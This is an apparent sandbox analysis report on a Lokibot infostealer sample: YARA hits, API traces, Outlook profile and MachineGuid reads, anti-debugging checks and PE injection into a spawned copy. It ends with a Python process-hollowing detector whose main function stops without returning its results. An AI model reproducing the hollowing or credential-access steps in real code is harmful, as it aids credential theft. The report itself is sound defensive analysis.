              Source: 2.2.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Lokibot | hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.2.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 | author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.2.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot | hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.U001P56ybm.exe.2430000.1.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE | date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.U001P56ybm.exe.2430000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 | author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.U001P56ybm.exe.2430000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot | hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE | date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 2.0.U001P56ybm.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Loki_1 | author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Lokibot | hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 | author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot | hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 | author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot | hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 | author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot | hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 | author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot | hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE | date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 2.0.U001P56ybm.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Loki_1 | author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Lokibot | hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.1.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 | author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.1.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot | hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE | date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 2.0.U001P56ybm.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Loki_1 | author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Lokibot | hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.U001P56ybm.exe.2430000.1.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE | date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.U001P56ybm.exe.2430000.1.unpack, type: UNPACKEDPE | Matched rule: Loki_1 | author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.U001P56ybm.exe.2430000.1.unpack, type: UNPACKEDPE | Matched rule: Lokibot | hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE | date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 2.0.U001P56ybm.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Loki_1 | author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Lokibot | hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.0.U001P56ybm.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE | date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 2.0.U001P56ybm.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: Loki_1 | author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: Lokibot | hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.1.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE | date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 2.1.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki_1 | author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.1.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Lokibot | hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Loki_1 | author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Lokibot | hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki_1 | author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Lokibot | hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki_1 | author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Lokibot | hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki_1 | author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Lokibot | hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_XORed_URL_in_EXE | date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Loki_1 | author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot | hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki_1 | author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Lokibot | hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki_1 | author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Lokibot | hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_004030E3 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_00406043
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_00404618
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_0040681A
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_10014844
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_1000C47B
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_10013D60
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_1000C96F
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_1000CD87
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_1000D1BC
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_1000F1CD
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_100169CC
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_1000D5F1
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_10015AB1
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_100142D2
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 2_2_0040549C
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 2_2_004029D4
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 2_1_0040549C
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 2_1_004029D4
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: String function: 00404B22 appears 54 times
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: String function: 00412093 appears 40 times
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: String function: 0041219C appears 90 times
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: String function: 00405B6F appears 84 times
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: String function: 00404BEE appears 56 times
              Source: U001P56ybm.exe, 00000000.00000003.285538431.0000000002AA6000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs U001P56ybm.exe
              Source: U001P56ybm.exe, 00000000.00000003.284071269.0000000002C3F000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs U001P56ybm.exe
              Source: U001P56ybm.exe | ReversingLabs: Detection: 25%
              Source: C:\Users\user\Desktop\U001P56ybm.exe | File read: C:\Users\user\Desktop\U001P56ybm.exe
              Source: U001P56ybm.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknown | Process created: C:\Users\user\Desktop\U001P56ybm.exe "C:\Users\user\Desktop\U001P56ybm.exe"
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Process created: C:\Users\user\Desktop\U001P56ybm.exe "C:\Users\user\Desktop\U001P56ybm.exe"
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Process created: C:\Users\user\Desktop\U001P56ybm.exe "C:\Users\user\Desktop\U001P56ybm.exe"
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 2_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 2_1_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
              Source: C:\Users\user\Desktop\U001P56ybm.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
              Source: C:\Users\user\Desktop\U001P56ybm.exe | File created: C:\Users\user\AppData\Local\Temp\nsi3BDC.tmp
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/4@0/1
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,
              Source: C:\Users\user\Desktop\U001P56ybm.exe | File read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_0040411B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
              Source: Binary string: wntdll.pdbUGP source: U001P56ybm.exe, 00000000.00000003.282481147.0000000002990000.00000004.00000001.sdmp, U001P56ybm.exe, 00000000.00000003.289797489.0000000002B20000.00000004.00000001.sdmp
              Source: Binary string: wntdll.pdb source: U001P56ybm.exe, 00000000.00000003.282481147.0000000002990000.00000004.00000001.sdmp, U001P56ybm.exe, 00000000.00000003.289797489.0000000002B20000.00000004.00000001.sdmp

              Data Obfuscation:

              Yara detected aPLib compressed binary
              Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 2.2.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 2.2.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.U001P56ybm.exe.2430000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 2.1.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.U001P56ybm.exe.2430000.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 2.1.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: U001P56ybm.exe PID: 4640, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: U001P56ybm.exe PID: 5684, type: MEMORYSTR
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_10011705 push ecx; ret
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 2_2_00402AC0 push eax; ret
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 2_1_00402AC0 push eax; ret
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,
              Source: C:\Users\user\Desktop\U001P56ybm.exe | File created: C:\Users\user\AppData\Local\Temp\nsi3BDD.tmp\yqbozdxn.dll
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exe | Process information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\U001P56ybm.exe TID: 5604 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\Desktop\U001P56ybm.exe Code function: 0_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\U001P56ybm.exe Code function: 0_2_00405C22 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\U001P56ybm.exe Code function: 0_2_00402630 FindFirstFileA,
Source: C:\Users\user\Desktop\U001P56ybm.exe Code function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
Source: C:\Users\user\Desktop\U001P56ybm.exe Code function: 2_1_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
Source: C:\Users\user\Desktop\U001P56ybm.exe Thread delayed: delay time: 60000
Source: C:\Users\user\Desktop\U001P56ybm.exe Code function: 0_2_10010C55 IsDebuggerPresent,
Source: C:\Users\user\Desktop\U001P56ybm.exe Code function: 0_2_10013280 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
Source: C:\Users\user\Desktop\U001P56ybm.exe Code function: 0_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,
Source: C:\Users\user\Desktop\U001P56ybm.exe Code function: 0_2_10001000 GetProcessHeap,HeapAlloc,RegCreateKeyExW,GetProcessHeap,HeapFree,
Source: C:\Users\user\Desktop\U001P56ybm.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\U001P56ybm.exe Code function: 2_2_0040317B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\U001P56ybm.exe Code function: 2_1_0040317B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\U001P56ybm.exe Code function: 0_2_1000EE31 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

              HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign process
Source: C:\Users\user\Desktop\U001P56ybm.exe Memory written: C:\Users\user\Desktop\U001P56ybm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\U001P56ybm.exe Process created: C:\Users\user\Desktop\U001P56ybm.exe "C:\Users\user\Desktop\U001P56ybm.exe"
Source: U001P56ybm.exe, 00000002.00000002.545170623.0000000000E30000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: U001P56ybm.exe, 00000002.00000002.545170623.0000000000E30000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: U001P56ybm.exe, 00000002.00000002.545170623.0000000000E30000.00000002.00020000.sdmp Binary or memory string: Progman
Source: U001P56ybm.exe, 00000002.00000002.545170623.0000000000E30000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\U001P56ybm.exe Code function: 0_2_10010E55 cpuid
Source: C:\Users\user\Desktop\U001P56ybm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\U001P56ybm.exe Code function: 0_2_0040594D GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,
Source: C:\Users\user\Desktop\U001P56ybm.exe Code function: 2_2_00406069 GetUserNameW,
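The two injection lines above (a second copy of U001P56ybm.exe spawned by the first, then a write to that copy's image base 0x400000 whose first bytes are 4D5A, the MZ header) are the fingerprint of process hollowing: the parent replaces the child's legitimate image with the unpacked Lokibot payload. The detector below is an added example and not part of the sandbox report or of the malware: it parses a constructed API trace in a simple "pid=N API key=value" layout assumed for the example (the NtUnmapViewOfSection, SetThreadContext and ResumeThread steps are the textbook hollowing sequence, which the report itself does not list), and it only fires on a PE image written into a child the writer created. Self-writes, such as an unpacker decrypting a payload in its own address space (the report's 0.2.U001P56ybm.exe.2430000 unpacked PE lives in the parent's own memory), and writes into unrelated processes are deliberately left to other rules.

```python
import re
from dataclasses import dataclass, field

# Constructed API-trace lines in the spirit of the "Memory written" / "Process created"
# signatures above. NOT sandbox output: the PIDs reuse the report's 4640 / 5684, and the
# unmap / SetThreadContext / ResumeThread steps are assumed for illustration.
SAMPLE_TRACE = r"""
pid=4640 CreateProcessW image=C:\Users\user\Desktop\U001P56ybm.exe flags=CREATE_SUSPENDED child=5684
pid=4640 NtUnmapViewOfSection target=5684 base=0x400000
pid=4640 WriteProcessMemory target=5684 base=0x400000 size=0x400 data=4D5A90000300000004000000FFFF0000
pid=4640 WriteProcessMemory target=5684 base=0x401000 size=0x9000 data=558BEC83EC10
pid=4640 SetThreadContext target=5684
pid=4640 ResumeThread target=5684
pid=4640 WriteProcessMemory target=4640 base=0x2430000 size=0x200 data=4D5A9000
pid=1234 WriteProcessMemory target=5678 base=0x7FF600000000 size=0x10 data=4D5A0000
"""

LINE_RE = re.compile(r"pid=(?P<pid>\d+)\s+(?P<api>\w+)(?P<rest>.*)")
KV_RE = re.compile(r"(\w+)=(\S+)")


@dataclass
class Event:
    pid: int
    api: str
    args: dict


@dataclass
class Finding:
    parent: int
    child: int
    image: str
    signals: list = field(default_factory=list)

    def score(self) -> int:
        return len(self.signals)


def parse_trace(text: str) -> list:
    """Parse 'pid=N API k=v ...' lines into Event objects; lines that do not match are skipped."""
    events = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if m:
            events.append(Event(int(m["pid"]), m["api"], dict(KV_RE.findall(m["rest"]))))
    return events


def detect_hollowing(events: list) -> list:
    """Flag a process that writes a PE image (data starting 4D5A) into a child it spawned.

    Only writes into processes the writer itself created count: that is the shape of the
    report's signature, and it excludes self-patching and unrelated cross-process writes.
    """
    spawned = {}   # child pid -> the CreateProcessW event that made it
    findings = {}  # child pid -> Finding
    for e in events:
        if e.api == "CreateProcessW" and "child" in e.args:
            spawned[int(e.args["child"])] = e
            continue
        if "target" not in e.args:
            continue
        target = int(e.args["target"])
        creator = spawned.get(target)
        if creator is None or creator.pid != e.pid or target == e.pid:
            continue
        f = findings.setdefault(target, Finding(e.pid, target, creator.args.get("image", "?")))
        if "CREATE_SUSPENDED" in creator.args.get("flags", "") and "spawned suspended" not in f.signals:
            f.signals.append("spawned suspended")
        if e.api == "NtUnmapViewOfSection":
            f.signals.append(f"image unmapped at {e.args.get('base')}")
        elif e.api == "WriteProcessMemory" and e.args.get("data", "").upper().startswith("4D5A"):
            f.signals.append(f"PE header written at {e.args.get('base')}")
        elif e.api == "SetThreadContext":
            f.signals.append("entry point redirected (SetThreadContext)")
        elif e.api == "ResumeThread":
            f.signals.append("child resumed")
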